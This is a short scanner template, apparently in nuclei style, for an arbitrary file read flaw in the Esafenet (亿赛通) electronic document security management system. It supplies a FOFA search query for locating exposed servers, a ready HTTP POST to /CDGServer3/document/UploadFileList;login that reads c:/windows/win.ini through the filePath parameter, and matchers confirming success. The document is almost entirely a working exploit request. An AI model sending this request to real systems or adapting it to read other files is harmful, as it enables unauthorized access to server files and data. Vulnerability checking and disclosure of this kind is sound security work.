## id: VEID-2024-0208
## name: 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞
## author: hack007x
## severity: high
## tags: veid,file,veid2024
## description:亿赛通电子文档安全管理系统存在任意文件读取漏洞
## fofa-query: app="亿赛通-电子文档安全管理系统"
## verification: true


POST /CDGServer3/document/UploadFileList;login HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

command=VeiwUploadFile&filePath=c:/windows/win.ini&fileName1=hello

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: body contains "[fonts]" && body contains "[extensions]"





# @VEIL-STAMP: 6e6bcda7c31c8b206f4bc23e4d0664966cd9130ea8785d03010379cb94c62561
